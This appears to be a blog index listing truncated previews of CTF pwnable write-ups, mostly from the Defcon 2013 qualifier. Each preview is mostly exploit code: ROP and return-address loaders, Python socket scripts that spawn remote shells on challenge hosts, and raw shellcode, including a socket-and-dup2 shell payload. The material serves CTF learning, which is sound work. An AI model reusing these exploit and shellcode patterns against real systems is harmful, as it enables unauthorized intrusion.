Category : Pwnables Summary : signal handler, use-after-free, lift esp to argv loader.c #include #define RET "\xbb\x8b\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x90\x42\x0e\x40"#define BINARY "\x74\x81\x04\x08" // &"GNU" char *args[] = {RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 RET16 ..
CTF
Category : Pwnables Summary : 5byte command Exploit#!/usr/bin/python from socket import * HOST = "192.168.123.134"PORT = 7879 cmd = "" s = socket(AF_INET, SOCK_STREAM)s.connect((HOST, PORT))s.send("sh&4\n")while 1:cmd = raw_input("$ ")if cmd == "exit":breakelse:s.send(cmd+"\n")print s.recv(1024)s.close() root@ubuntu:~/givemeshell# ./exploit.py $ iduid=1005(givemeshell) gid=1005(givemeshell) grou..
pwnable (0x41414141)- pwnable1 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable1- pwnable2 : (not yet)- pwnable3 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-pwnable3- pwnable4 : (not yet)- pwnable5 : (not yet) shellcode (\xff\xe4\xcc)- shellcode1 : (not yet)- shellcode2 : http://pwn3r.tistory.com/entry/Defcon-CTF-2013-qual-shellcode2- shellcode3 : http://pwn3r.tistory.com/..
Category : Pwnable (\xff\xe4\xcc) Summary : unicode shellcode, overwrite below byte Exploit#!/usr/bin/python from socket import *from struct import packimport time HOST = "penser.shallweplayaga.me"PORT = 8273 """51# push %rcx00 45 00# align59 # pop %rcx00 45 0052 # push %rdx00 45 0058 # pop %rax00 45 0032 00# xor (%rax), %al50# push %rax00 45 005a# pop %rdx00 45 0059# pop %rcx00 45 0059# pop %rc..
Category : Pwnable (\xff\xe4\xcc)(empty) Summary : short shellcoding, reuse pointer in ecx /*00A21E80 8B09 MOV ECX,DWORD PTR DS:[ECX]00A21E82 8D41 05 LEA EAX,DWORD PTR DS:[ECX+5]00A21E85 66:8138 4141 CMP WORD PTR DS:[EAX],414100A21E8A ^75 F4 JNZ SHORT 00A21E8000A21E8C C3 RETN*/root@ubuntu:~# (python -c 'print "\x8b\x09\x8d\x41\x05\x66\x81\x38\x41\x41\x75\xf4\xc3"')| nc linked2.shallweplayaga.me ..
Category : Pwnable (\xff\xe4\xcc) Summary : generate shellcode with game Exploit#!/usr/bin/env python import socketimport timeimport threadimport re HOST = "blackjack.shallweplayaga.me"PORT = 6789 SHELLCODE = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80..
Category : Pwnables Summary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass gen_answer_dict.py import refrom socket import *from struct import pack, unpack HOST = "lolergab.shallweplayaga.me"PORT = 5000 def SaveFile(data):f = open('dic.txt', 'r')if f.read().find(data) != -1:f.close()returnf.close() f = open('dic.txt', 'at')f.write(data)f.close() def Attack(s):data = s.recv(1024)l..
Category : Pwnables (0x41414141) Summary : uninitialized variable, stack based buffer overflow, ROP on ARM linux Exploit#!/usr/bin/python# recv(4, buf, len(cmd)) -> system(buf) from socket import *from struct import packimport time, sys p = lambda x: pack("
